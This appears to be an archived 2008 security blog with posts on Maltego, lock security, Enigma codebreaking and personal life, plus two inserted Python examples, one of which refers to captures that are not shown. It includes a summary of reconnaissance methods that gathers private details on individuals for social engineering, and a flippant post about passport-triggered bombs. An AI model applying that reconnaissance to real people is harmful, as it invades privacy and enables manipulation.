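The before/after comparison of the two captures can be automated. The Python below is an added example, not part of the original post: it parses tcpdump's port 53 output and reports every query that went to a resolver outside the intended set. The function names and the ALLOWED set are assumptions of the example; the sample lines are copied from the captures above.

```python
import re
from collections import defaultdict

# Matches an outgoing DNS query as tcpdump prints it, for example:
#   15:52:19.525862 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 28225+ A? www.blogger.com. (33)
# The destination port shows as "domain", or as "53" when tcpdump runs with -n.
QUERY_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\S+)\.(?P<sport>\d+) > "
    r"(?P<resolver>\S+)\.(?:domain|53): "
    r"(?P<id>\d+)(?P<flags>\S*)(?: \[[^\]]*\])? "
    r"(?P<qtype>[A-Z0-9]+)\? (?P<name>\S+)"
)

# Resolvers the host is supposed to use (assumption: the two nameserver
# entries from resolv.conf plus the name tcpdump printed for them).
ALLOWED = {"resolver1.opendns.com", "208.67.222.222", "208.67.220.220"}

# Sample input: lines copied from the capture taken before squid was restarted.
BEFORE_RESTART = """\
15:52:19.525862 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 28225+ A? mokumvonamsterdam.blogspot.com. (48)
15:52:19.526356 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 28417+ PTR? 188.250.202.213.in-addr.arpa. (46)
15:52:19.542138 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 28225 2/7/7[|domain]
15:52:19.739094 IP resolver1.opendns.com.domain > my-host.xxx.39176: 28417 1/0/0 (75)
15:52:20.698247 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 63234+ A? www.blogger.com. (33)
15:52:21.028751 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 63234 2/7/7[|domain]
15:52:23.133656 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 57393+ A? www.youtube.com. (33)
""".splitlines()

# Sample input: lines copied from the capture taken after the restart.
AFTER_RESTART = """\
16:12:04.543848 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 8407+ A? mokumvonamsterdam.blogspot.com. (48)
16:12:04.567414 IP resolver1.opendns.com.domain > my-host.xxx.39176: 8407 2/0/0[|domain]
16:12:05.282740 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58294+ A? www.blogger.com. (33)
16:12:05.306651 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58294 2/0/0 CNAME[|domain]
16:12:10.189203 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58807+ A? twitter.com. (29)
16:12:10.212537 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58807 1/0/0 A 128.121.146.100 (45)
""".splitlines()


def parse_queries(lines):
    """Return one dict per outgoing query; replies and other lines are skipped."""
    queries = []
    for line in lines:
        m = QUERY_RE.match(line.strip())
        if m:
            queries.append({
                "ts": m["ts"],
                "resolver": m["resolver"],
                "qtype": m["qtype"],
                "name": m["name"].rstrip("."),
            })
    return queries


def queries_per_resolver(lines):
    """Count outgoing queries per destination resolver."""
    counts = defaultdict(int)
    for q in parse_queries(lines):
        counts[q["resolver"]] += 1
    return dict(counts)


def off_policy(lines, allowed):
    """Queries sent to any resolver that is not in the allowed set."""
    allowed = {a.lower() for a in allowed}
    return [q for q in parse_queries(lines) if q["resolver"].lower() not in allowed]


if __name__ == "__main__":
    for label, capture in (("before", BEFORE_RESTART), ("after", AFTER_RESTART)):
        print(label, queries_per_resolver(capture))
        for q in off_policy(capture, ALLOWED):
            print("  off-policy:", q["ts"], q["resolver"], q["qtype"], q["name"])
```

Fed from a live capture, any non-empty off_policy() result means some process on the host is still using a resolver other than the ones listed in resolv.conf.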
vrijdag 2 mei 2008
Google ad's my Inbox(1) !!!
Here is a nice variation on misleading Google ads: claiming your Inbox has (1) unread email, smart move [thanks to Twitter, Twinkle & Jeroen Mirck for making this possible :P ].
donderdag 1 mei 2008
Maltego v2 - is ready!

Oh boy I am so excited!
Get it at: http://www.paterva.com/maltego/
All,
After 15 months of work Maltego version 2.0 is ready. It's been a long and interesting road. Many of you have seen the product grow from beta 1 to beta 2, then KZ3 and JS1. I've shared with you the challenges, the ups and downs. Finally, today, I am happy to release version 2.0.
Version 2.0 is commercial and I feel it's got the right to be commercial because it's by far the coolest and most useful application I've ever used (OK so perhaps I am just slightly biased). As I've mentioned before - it goes live to this list first. Everything is set up, but not linked to the main site. I will link it on Monday.
Also - as promised - a list of new features/improvements:
* Load/Save of entire graphs means you can always go back to your investigation.
* Printing of graphs (over multiple pages)
* Export of entities (CSV format) makes it easy to import Maltego data into other databases.
* Commercial grade layout library:
    o The layout and navigation have been optimized for speed and usability.
    o Four layout types to rearrange data the way YOU want it.
    o Two view types for finding relevant info on large graphs.
* More entities and 20 brand new transforms for even deeper searches and more information.
* Search/Find (on entity value, detailed info and additional fields) helps you to get to key nodes quicker.
* Multiple open graphs on different tabs for easy switching between graphs.
* Dedicated clear-all, zoom buttons for notebook users.
* Hollywood quality look & feel will impress your friends and your boss.
* Integrated help on transforms and entities to increase your learning curve.
* Complete user guide ensures you are never lost.
* Prepopulated and preconfigured transforms and transform sets saves you time.
* Population of API key integrated with license key so it’s never lost.
* Platform independent installer means you can install it anywhere.
If you want to see what it looks like before making a commitment you should look at the user guide and the screen shots. You should also read the system requirements.
The documentation can be found at http://ctas.paterva.com/wiki
Enjoy responsibly,
Roelof.
woensdag 30 april 2008
Avoiding speed traps, different
zaterdag 26 april 2008
Locks, SKG, the challenge
Whenever I move in to a new apartment, a new office building or take on the responsibility of other property that is secured by a cylinder lock, I exchange it. The old cylinder and all its associated keys will be documented and stored for later retrieval.
The new cylinder will be bought by me, at a store I trust and with a security certificate I like and I pay attention that _nothing_ that can identify me or my location gets associated with the certificate for I would not like to have to worry about the whereabouts of that data since it is not under my control [the certificate can be used to remake a key without having a copy of the key].
So I pay by cash and have a second locksmith do the installation.
The apartment I moved in recently is a newly built complex. About a 1.000 apartments have been built by 45 different subcontractors who dig holes, lay pipes, pull wires, connect walls, paint doors and insert locks. For whatever it is worth: I do not trust them. The chance that one of the workers copies the cuts of my particular key is just something that makes me feel uncomfortable.
Personally I know too little about the inner workings of locks to be able to make a valid judgement about the grade of the lock, so I will buy only stuff that does comply with the toughest international standards, including ISO 9001/2000, UL, CEN, VDS, SKG, CPC and A2P. Or when in Holland, the SKG [Stichting Kwaliteit Gevelbouw].
It is amazing to see that the price difference between a SKG ** and *** is rather low in comparison to the added features. One of the features I find a must have is the bump key proofing of locks. But all of this is just to prevent the damage free opening of the door.
Other measures need to be taken to prevent the more common 'crowbar style' and the 'Bulgarian' method [drilling]. A good resource of more information on the topic is The Open Organisation Of Lockpickers that is credited with spreading the word on the issue in Holland, but even more important the concept behind high security lock design by Ross Kinard.
vrijdag 25 april 2008
Googlology!
What rules now is Googlology. It's religion on steroids. No need for G*d in heaven, no need for spirits in the sky. Googlology designs and runs its own heaven, and its name is 'The Cloud'
The cloud will take care of your data, no matter where you need it, it will be there. The cloud will provide your services with more computing power than it needs, and then some. The cloud will harbour your applications, your email, your videostream, your rants, your pictures, your secrets and your dates, your world, your drawings, your finances, your money, and a whole lot more.
And I should know, since I drink all the Google Gulp from a hose.
But what if the cloud, errr, sort of not does what the EULA sort of makes you believe? What if the lawyer@TheCloud p0wnzers you? And your data? What if, insert-your-personally-favorite-upper-being-here, strikes back and lets some unknown entity take control over, well, you, basically?
How does one secure the absolute power of the cloud? There are some very smart people talking about it but lots of discussion is still about the definition, much less about the consequences, let alone what it actually means or how to do it.
Do you want to be the one who turns off the light now that everybody has left the old arena, or will you participate in shaping the future?
dinsdag 22 april 2008
Replace your MAC harddisk, easy

I should do stuff more often, at least it makes far hotter stuff come out.
Couple of days ago I decided that both MAC laptops in the house needed more storage. The G4 PowerBook and the MacBook. So I ordered a Western Digital Scorpio 250GB 5400RPM and a Western Digital Scorpio 320GB 5400RPM. The replacement of the MacBook one can do with a sharp kitchen knife, no problem. Just remove the battery [do not bother shutting the OS down, it's as stable as my weight] and take a sharp kitchen knife [I used the new Global one I gave my wife a couple of days ago]. Unscrew 3 little screws, pull out the harddisk, take strong pliers, remove the 4 screws, take the plastic thingy, wrap it on the new disk, sort of re attach the 4 screws, stick the thing back in. Ram the old battery in and off you go [never mind about the 3 little screws and the metal strip, all just surplus weight].
Reinstall and do not mind about the updates that want you to reboot your DVD version of the OS 4 times!
Now the Powerbook, that is another story. About 23 Phillips screws [tiny fuckers!] and then 2 torx 6, that is SIX, not 8, but 6, the smallest possible tool made only in Switzerland and it will set you back about the same amount of euros as the 320Gb disk.
Then you get to pull off two, well, 'connectors' that are actually used open ended flatcables: class construction. Putting the whole thing back is a joy. Takes the precision of a live-bomb-defuser, nice engineering.
Installing the OS of course requires the PPC version. Inserting the iMac Intel version yields a nice panic message. Never mind about the I-do-not-know-how-many updates and reboots [even for the so called 3.1.x Safari update one gets a reboot!], for they slow down the secure OS X anyway.
Right after finishing something flashy caught my eye: the MHZ2 CJ.
A 2.5 inch Serial-ATA Revision 2.6 (Gen1i and Gen2i) hard disk with embedded AES 256-bit hardware-based encryption, high-speed rotational speed of 7200rpm, it supports SATA 3.0Gbit/s and the capacities go up to 320GB with a 16MB buffer... How is that for cool?
You know what that means as soon as you see it: dumping the current disk for no reason on ebay, including all the private data it has accumulated in a month's time and overpay for the new disk since it is new and hot.
vrijdag 18 april 2008
Searching & Finding, part II
This had me completely baffled. WHAT? I was saying to myself WHAT IS WRONG WITH THIS DUDE? I mean, after one look at the concept of Maltego I knew that that is the only way forward. Maybe he drank a little too much Google Gulp? Maybe he was trying to hide something since Google does not do pre-announcements? Or maybe, he'd seen Maltego or Delver too and was just trying to suppress their market value so the goog's could snatch it up for little money in a little time?
"We have no intention of competing with the Googles of the world, because Google is doing a very good job of indexing the Web and bringing you the Wikipedia page of every search query you're looking for," says Liad Agmon, CEO of Delver. But we've been there, seen it, and even do it ourselves now.
But that does not satisfy anymore. You know the procedure yourself: go to google.com, type a couple of keywords, check the first listing, alter the keywords [order even], check the listing and on and on. Most of the listings you get will be actively manipulated by crooks and link spammers.
So we need something else. As Anand Rajaraman puts it: if you have limited resources, add more data rather than fine-tuning the weights on your fancy machine-learning algorithm. Of course, you have to be judicious in your choice of the data to add to your data set. And this is exactly the point I am trying to drive home. More data sources [and some very decent post processing] enhances the results in amazing ways. [he works on his own SE too, called kosmix].
Some say, it is a terrible idea, like KublaiKhan. "This sort of searching will result in information from 'opposing sides' of controversies or arguments being deprecated, resulting in skewed information being available--because people tend to associate themselves with other people of the same opinion." He goes on: "This new search engine will be wildly popular amongst the type of person who enjoys violent flamewars, and will be useless for any person who wishes to consider both sides of a situation before forming an opinion... so it's going to be an enormous success and if I had the cash I'd invest in it. :-/"
Personally I would like to quote merreborn in reply to that remark:
"Sorry, I can't friend you, you'll screw up my search results"
Update:
Seems there is much much more going on and wrong between google and social websites...
vrijdag 11 april 2008
Everything you ever wanted to know about the Enigma
Part of the first class encryption of the Enigma was the possibility for the clerk to make up his own six-letter settings. This led to the Polish cryptanalysts occasionally being able to guess the settings. The military did not allow an obvious setting such as ABC. However, cipher clerks sometimes chose settings like QWE (the first three letters on the keyboard) or names. In the example above, if the first three letters were HIT, the cryptanalysts could guess that KOS and RLB were the ciphers to LER, spelling out HITLER. BER was usually followed by the ciphers of LIN. One particular German code clerk continually used his girlfriend’s name, Cillie, for his messages, and so these easy-to-guess indicators became known as "Cillies."
After the English had boarded the U-110 [thanks Fritz-Julius Lemp for being a pussy!] and got their hands on a working Enigma [with all dials in the correct setting for the whole month], they were able to destroy lots of U boats that were decimating the US-UK ships. Admiral Doenitz just knew something was wrong and made a change by adding a thin fourth rotor between the leftmost rotor and the reflecting plate.
Bletchley Park learned of the impending change from decrypts and captured material, but until it was actually implemented there was little they could do to prepare. Fortunately, the Germans made an error. In December 1941, before the change had been made official, a U-boat sent a message using the four-rotor machine. To compound the mistake, the same message was retransmitted using only three rotors. From this seemingly innocuous error, the cryptanalysts at BP determined the wiring of the fourth rotor. :P
In order to set up the U.S. Navy Bombe, cryptanalysts first had to determine a "crib." A crib is the unenciphered text that is assumed, or known, to appear in the message.
Cribs could come through a variety of methods. Some of the best cribs came from errors made by the Germans themselves. On more than one occasion, a German signal clerk sent the same message twice in two different codes. If the code for one was known, it provided a crib for the unknown system.
Another frequent German mistake came in standardized messages. For example, a shore weather station in the Bay of Biscay sent out a message every day at 07:00 which began, "The weather in the Bay of Biscay will be. . . ." Knowing the exact wording of a message made a perfect crib for the Allies, so it became a high priority to intercept the daily message from this weather station.
A final example of a common German error involved the practice of submerged U-boats. When the submarines resurfaced after extended periods of time under water, they requested all the important messages they had missed while below the waves. The transmissions that followed inevitably involved communications previously sent and deciphered. Cryptanalysts merely checked the back files for messages with the same number of letter groups and used them as cribs for the new message. Since the resulting message would be identical to the previous one, it helped reveal the Enigma setting for the current day. With the daily setting, all the current day's messages could be read.
Other cribs came from knowing the current activities of the enemy. If, for example, a battle occurred, it could be assumed that messages following the attack reported on the battle. It was more difficult for the cryptanalysts to build cribs for these types of messages since it involved guesswork.
Because the Enigma rotors moved with each keystroke, a letter typed twice usually enciphered to two different letters. Also, the Enigma could not encrypt a letter to itself. Finally, the Germans indicated a space between words with the letter X and spelled out numbers. Knowing these details played an important role in ultimately breaking the Enigma's daily settings.
Now why do we see these same weaknesses made over and over again? Sometime ago there was one for sale too. Damn that would have been the hottest geek present ever. Prices have not been too extreme either...
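Two of the details above, that the Enigma never enciphers a letter to itself and that spaces went out as X with numbers spelled out, are already enough to rule out most alignments of a crib against an intercept. The Python below is an added example, not part of the original post: it normalises a guessed plaintext the way the operators did and slides it along the ciphertext, rejecting every offset where a crib letter would have to encipher to itself. The ciphertext is constructed for illustration (not real traffic), and the German digit words and the function names are assumptions of the example.

```python
import re

# Illustrative German digit words (assumption of this example; the post only
# says that numbers were spelled out).
DIGIT_WORDS = {
    "0": "NULL", "1": "EINS", "2": "ZWEI", "3": "DREI", "4": "VIER",
    "5": "FUENF", "6": "SECHS", "7": "SIEBEN", "8": "ACHT", "9": "NEUN",
}


def to_enigma_text(plain):
    """Apply the conventions named in the post: X for a space, digits spelled out."""
    out = []
    for ch in plain.upper():
        if ch == " ":
            out.append("X")
        elif ch in DIGIT_WORDS:
            out.append(DIGIT_WORDS[ch])
        elif "A" <= ch <= "Z":
            out.append(ch)
        # Anything else (punctuation) has no key on the machine and is dropped.
    return "".join(out)


def first_clash(ciphertext, crib, offset):
    """Index within the crib of the first letter equal to the ciphertext letter
    above it, or None when the alignment is possible."""
    for i, plain_letter in enumerate(crib):
        if ciphertext[offset + i] == plain_letter:
            return i
    return None


def crib_positions(ciphertext, crib_plain):
    """Return [(offset, clash_index_or_None), ...] for every alignment."""
    ct = re.sub(r"[^A-Z]", "", ciphertext.upper())  # drop the 5-letter grouping
    crib = to_enigma_text(crib_plain)
    return [
        (offset, first_clash(ct, crib, offset))
        for offset in range(len(ct) - len(crib) + 1)
    ]


def possible_offsets(ciphertext, crib_plain):
    """Offsets at which no crib letter coincides with its ciphertext letter."""
    return [o for o, clash in crib_positions(ciphertext, crib_plain) if clash is None]


# Constructed sample: an 18-letter "intercept" in five-letter groups and a
# guessed fragment of a weather report.
SAMPLE_CIPHERTEXT = "QFTZW RKXPS EVBHN UGL"
SAMPLE_CRIB = "WETTER 7"

if __name__ == "__main__":
    print("crib as keyed:", to_enigma_text(SAMPLE_CRIB))
    for offset, clash in crib_positions(SAMPLE_CIPHERTEXT, SAMPLE_CRIB):
        verdict = "possible" if clash is None else f"impossible (crib letter {clash} maps to itself)"
        print(f"offset {offset}: {verdict}")
```

Only the surviving offsets need to be tried further, which is why a long, exactly known crib such as a daily weather report was so valuable.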
dinsdag 8 april 2008
Improvised Explosive Device 2.0

As much harm as the improvised explosive devices (IED) do, now it is time for version 2.0
The interactive IED, the IED that will blow up the people of the nationality you want dead, not just a passerby. Till now it has been difficult at times to determine the timing to actually kill the guy you hate the most. Come to the rescue:
E-Passports
Already in 2006 it was shown that the then 'new' RFID'ed passports were both hackable, and posed a security threat. Since a couple of weeks the Dutch have entered the arena and are being sold E-Passports too.
You gotta love it when government people do security.
Ross Anderson: Security Engineering 2.0
As a matter of fact, since most of us are working for clients and we sell our services, they too are better off when we do not 'just' display how things break, but how we make things break safely.
In that light, the interview my good friend [and smart B to boot] Craig Balding did with Mr. Ross Anderson about security engineering comes right on time. Enjoy.
PS
It was brought to my attention that Amazon does some weird dating stuff. The book will be Released on April 14th, but they have one in stock now, if you order today you can have it delivered on the 9th of April... how's that for JIT!
zondag 6 april 2008
Burning down the house!

You know, today I bought a lighter, a Varaflame Ronson.
You know the brand?
I think everybody's father had one, so did mine.
I was about 6 or so and he got one. A nice shiny silver one.
I woke up early one day and took it from the living room into my room. We had some sort of 'grass' flooring, typical for hippies at that time [think early 70's]
Somehow I managed to set it alight.
Everybody is asleep, my 4 year old sister, my parents: everybody in my whole wide world.
The room starts filling up with smoke, heat, flames and a one scared boy: moi.
I used the same trick as I still do:
“Dear Lord, let me survive this now and I know that in the future I will pay back humanity!”
Suddenly I moved to the hallway, my mother always left two glasses of water there for when we would wake up early. I took them and threw them in the fire. My feet and some other stuff took care of the remaining fire.
...
A couple of minutes [or hours?] my parents woke up, smelled the smoke, saw the hole and realized very quickly what had happened and who started it all.
Never mind who stopped it, but they knew all right who started it.
The punishment I got for that was something that... I cherished. I loved it, for I was alive! And so were they. I knew I had something to make up to, but I also knew that there was nothing in the world what could kill me until I was ready.
And today I bumped into one of those lighters. And now I own one.
Getting old and knowing it...
There are moments in life, that somehow your surroundings tell you more about you than about the actual artefacts that make it up. One of those moments just happened to me.
It was a flea market, like you see many of them, when you are into flea markets. Big, cold, and stuffed with... stuff. I have been to my fair share of those. Sometimes by accident, sometimes because someone tells you there is something special to be had, sometimes with new [girl-]friends who take you places you do normally not go to.
This visit was inspired by new friends.
Anyway, people try to sell all kinds of stuff, old & fake, polished & rotten. Basically whatever was unwanted at one point of its existence.
The worst thing was this car. I got it on a Monday, loved it to death because it was so advanced. It was a little bigger than the normal cars. It had stuff in it that you could get out from the back. I took it to school, played with it day and night. One day my [Thursday] teacher Boudy de Vries took it from me. He disliked us boys playing with cars instead of listening to the same old, same old.
On Monday I collected all my wit and guts and asked it back. The sucker simply said [and I remember the smuck smile on his bearded face up until today!] "I do not have it and never took it!"
The son of a bitch never gave it back. Boudy de Vries, I hate that guy with a passion.
vrijdag 4 april 2008
But not without Manager 2.0
Knowledge sharing and learning is imposed additional work VS Knowledge sharing and social learning is a welcome natural part of people's everyday work
Work takes place behind closed doors VS Work takes place transparently where everyone can see it
IT Tools are imposed on people VS People select the tools that work best for them
People are controlled out of fear they will do wrong VS People are given freedom in return for accepting responsibility
Information is centralized, protected and controlled VS Information is distributed freely and uncontrolled
Publishing is centrally controlled VS Anyone can publish what they want
Context is stripped from information VS Context is retained in the form of stories
People think quietly alone VS People think out loud together
People tend to write in the third person, in a professional voice VS People write in the first person in their own voice
People especially those in authority are closed to new ideas and new ways of working VS Everyone is open to new ideas
Information is pushed to people whether they have asked for it or not VS People decide the information they need and subscribe to it
The world is seen through a Newtonian cause and effect model VS The world is recognized to be complex and that different approaches are needed
Now all looks good and well in World 2.0. Everybody simply changes from consumer to prosumer and takes an active role. Business as usual 2.0. Cool. But where does one find managers 2.0?
donderdag 3 april 2008
Do Know Evil!

DoKnowEvil.nl
DoKnowEvil.biz
DoKnowEvil.org
DoKnowEvil.de
DoKnowEvil.eu
Now all that is missing is the T-Shirt, Krassimir :P
Google searches best, Maltego finds
Anand Rajaraman is the Consulting Assistant professor at the Computer Science Department at Stanford University, and he drives the point home much better in this article. To sum it up, if you have limited resources, add more data rather than fine-tuning the weights on your fancy machine-learning algorithm. Of course, you have to be judicious in your choice of the data to add to your data set.
That is exactly what Maltego does and lets you do. It gives a plenitude of data sources and lets you, the human, decide what information weighs most, considering your particular query.
woensdag 2 april 2008
dinsdag 1 april 2008
There is never enough time, thank you for yours...
zondag 30 maart 2008
If you are going to be late, come with flowers.
zaterdag 29 maart 2008
People that change the way we perceive the world.
http://www.paterva.com
Maltego, Maltego will change the [online] world as we know it. What google once did to searching Maltego will do to finding.
Currently all that is being shown & displayed is vast amounts of data: exactly the thing that computers like and do a good job with, but unusable for humans. Enters Maltego. Maltego will take a seed [individual's name, a domain name, email address, whatever] and finds related data, just like everybody and his dog does.
But then the 'post processing' starts, and Maltego will show its muscle: based upon some smart correlating and weighting, it will show you the results it found, in a graphical way, in a nice pattern. In comes the thing we humans do good: pattern recognition. We excel at seeing patterns and since Maltego excels at displaying it, we now have a man-machine combination.
Give me some time and I'll show you...
http://www.paterva.com/web2/maltego/maltego.html
vrijdag 28 maart 2008
In the end, Joe 6-pack decides...
"It's better to ask for forgiveness than to ask for permission" anon
"We do not want our _users_ to break the EULA" Roelof Temmingh
"We rely on the intelligence of our router to play nice. Even if we know hop 5 is not playing "nice" with our packets, there is nothing we can do but stop... that sounds like DoS to me" FX
"Nobody uses the latest version of IOS. It is "banana" software: it ships green, and after it lays a long time at the customer, it gets yellow and eatable :P"
"In 12.4 they create heap logs in the data section, since it has space after loading"
"Uncompressing data in READ ONLY memory & writing it back.. because we can!"
"A problem with IOS is that you can not find what was wrong 5 minutes ago, if the processes start behaving good again"
CIR is a cool tool under development.
"Lawful interception: the government snooping IOS, what do you know about it?"
"It enabled us to see if & what is wrong, or that we have plenty time to replace everything with Juniper boxes :D"
"Software that needs to parse large numbers of formats are potentially dangerous [think AV, Indexing software, media players]"
"Media parsing should be done sandboxed"
"Media files|streams are as dangerous as any other zip file"
dinsdag 25 maart 2008
BlackHat: hacking by numbers
Interesting stuff, it basically boils down to: get as much as possible information on your target. Do this by utilizing public sources [think google [link:], netcraft, ARIN, msn.livesearch.com [ip:], kartoo.com and the likes] and reverse the pointers you find there. See what else is hosted on these IP addresses, see what other domains are registered and|or linked. Check for 'backlinks' that might indicate strong ties between companies.
And keep doing the:
:start
Single domain
Expand
Lots of domains
Reduce
Find what we really need
goto start
Both Nick & Jeremy keep saying: "Remember, domain names are IP addresses and IP addresses are points of attack"
Last but not least:
Find out private information of key individuals for social engineering.
Oh and for our hosts, this is for you :D
Peeps & posts [from] here:
Nathan McFeters
Petko D. Petkov
PortSwigger & Marcus
Mikko Hyykoski
Sandro
And some who are not:
Dimitri Sklyarov
maandag 24 maart 2008
WRT54GS + MESH + SOLAR == cool
So.
Sveasoft I like as replacement firmware, and they released a MESH version.
There are plenty of people who attempted to run a WRT off of solar.
Soon my SSID will popup all over :P
Power consumption and solar needs
vrijdag 21 maart 2008
The book thief
I'll drink the wine:
Montepulciano D'Abruzzo
that is Red
and TRebbian D'Abruzzo
that is white
What's next?
donderdag 20 maart 2008
Inside the Twisted Mind of the Security Professional
I replied: "What's really interesting is that these people will send a tube of live ants to anyone you tell them to."
Security requires a particular mindset. Security professionals -- at least the good ones -- see the world differently. They can't walk into a store without noticing how they might shoplift. They can't use a computer without wondering about the security vulnerabilities. They can't vote without trying to figure out how to vote twice. They just can't help it.
SmartWater is a liquid with a unique identifier linked to a particular owner. "The idea is for me to paint this stuff on my valuables as proof of ownership," I wrote when I first learned about the idea. "I think a better idea would be for me to paint it on your valuables, and then call the police."
Really, we can't help it.
This kind of thinking is not natural for most people. It's not natural for engineers. Good engineering involves thinking about how things can be made to work; the security mindset involves thinking about how things can be made to fail. It involves thinking like an attacker, an adversary or a criminal. You don't have to exploit the vulnerabilities you find, but if you don't see the world that way, you'll never notice most security problems.
[...]
The security mindset is a valuable skill that everyone can benefit from, regardless of career path.
woensdag 19 maart 2008
maandag 17 maart 2008
If remittances brought development, Mexico would be Switzerland.
But when I ask you to name a single country that has developed through remittances: the answer is no — there's none.
zondag 16 maart 2008
Open Source, what would life be without it?

SSL-Explorer is the world's first open-source, browser-based SSL VPN solution. This unique remote access control solution provides you with a means of securely accessing intranet applications and resources using a standard web browser.
No client-side software needs to be installed on your user's systems and maintenance is centralised and simple. SSL-Explorer relies on the ubiquitous Java™ web technology and hence requires just a standard web browser to take advantage of full remote access. Network traffic can be tunnelled through the SSL connection with ease and your email and intranet web/file resources are securely accessible from outside the corporate network with just a single firewall configuration required post-installation.
Now you can carry your favorite computer programs along with all of your bookmarks, settings, email and more with you. Use them on any Windows computer. All without leaving any personal data behind.
PortableApps.com provides a truly open platform that works with any hardware you like (USB flash drive, iPod, portable hard drive, etc). It's open source built around an open format that any hardware vendor or software developer can use.
The Portable Apps Suite™ is free. It contains no spyware. There are no advertisements. It isn't a limited or trial version. There is no additional hardware or software to buy. You don't even have to give out your email address. It's 100% free to use, free to copy and free to share.
Saturday 15 March 2008
THE KNIGHT
that he was not chivalrous
but a horseman
the horseman confessed chivalrously
that he was not forthright
but a knight
Tuesday 11 March 2008
You might not know who is right, but you always know who is the boss
You know, one of those days that you anticipated, that you knew was coming, that was inevitable.
One of them days you had thought of, prepared for, and applied "your worst case scenario solution book" to, a thousand times.
One of them days you saw coming, and you knew would bring hell on earth, but you live by the coercion or escalation domination doctrine.
The day that you would be as sharp as a razor. Clean. Ready. Just. And most of all: do the right thing.
The day you'd have G*d on your side.
But then s|he took a day off and you tripped, off balance. And somehow things got really out of hand. You lost control over everything. You:
Used the wrong words.
Fcuked up the timing.
Lost the oversight.
Held the book upside down.
Wet your pants.
Today, March 11th, will go down in my history book as the day that was and should not have been.
Monday 10 March 2008
Firefox FullScreen on OSX
Start Firefox, create a new bookmark [I like it on the bookmark toolbar], enter a good name [FullScreen seems nice] and enter this line of code:
javascript:self.moveTo(0,0); self.resizeTo(screen.availWidth,screen.availHeight);
Et voilà: Sarah got her fullscreen browser!
Sunday 9 March 2008
Video on the iPhone? SURE!
It's smaller and optimized for the iPhone native resolution.
Enjoy!
Monday 25 February 2008
Pakistan Hijacks YouTube's IPs
Was it a typo on a filter over at AS17557? Most likely we will never know, since those people in Pakistan are not really the kind of open-minded guys, hence the hijack of YouTube's IPs in the first place.
Maybe this will lead to a global split of the I-network as we know it.









